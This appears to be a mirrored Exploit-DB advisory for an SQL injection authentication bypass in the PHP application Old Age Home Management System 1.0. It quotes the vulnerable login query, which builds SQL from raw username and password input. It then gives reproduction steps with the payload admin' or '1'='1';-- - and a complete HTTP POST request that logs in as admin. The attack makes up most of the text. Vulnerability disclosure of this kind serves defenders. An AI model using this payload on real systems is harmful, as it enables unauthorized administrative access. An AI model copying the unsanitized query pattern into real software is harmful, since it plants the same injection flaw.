/oahms1.0-sqli-authenticated-bypass

Old Age Home Management System 1.0 - SQLi Authentication Bypass

Old Age Home Management System 1.0 - SQLi Authentication Bypass

original link: https://www.exploit-db.com/exploits/50966

# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass
# Date: 12/06/2022
# Exploit Author: twseptian
# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
# Version: v1.0
# Tested on: Kali Linux

Vulnerable code

line 9 in file "/oahms/admin/login.php"

[SNIP]
$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");
[SNIP]

Steps of reproduce:

  1. Go to the admin login page http://localhost/oahms/admin/login.php
  2. sqli payload: admin' or '1'='1';-- -
  3. password: password

Proof of Concept

POST /oahms/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/oahms/admin/login.php
Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=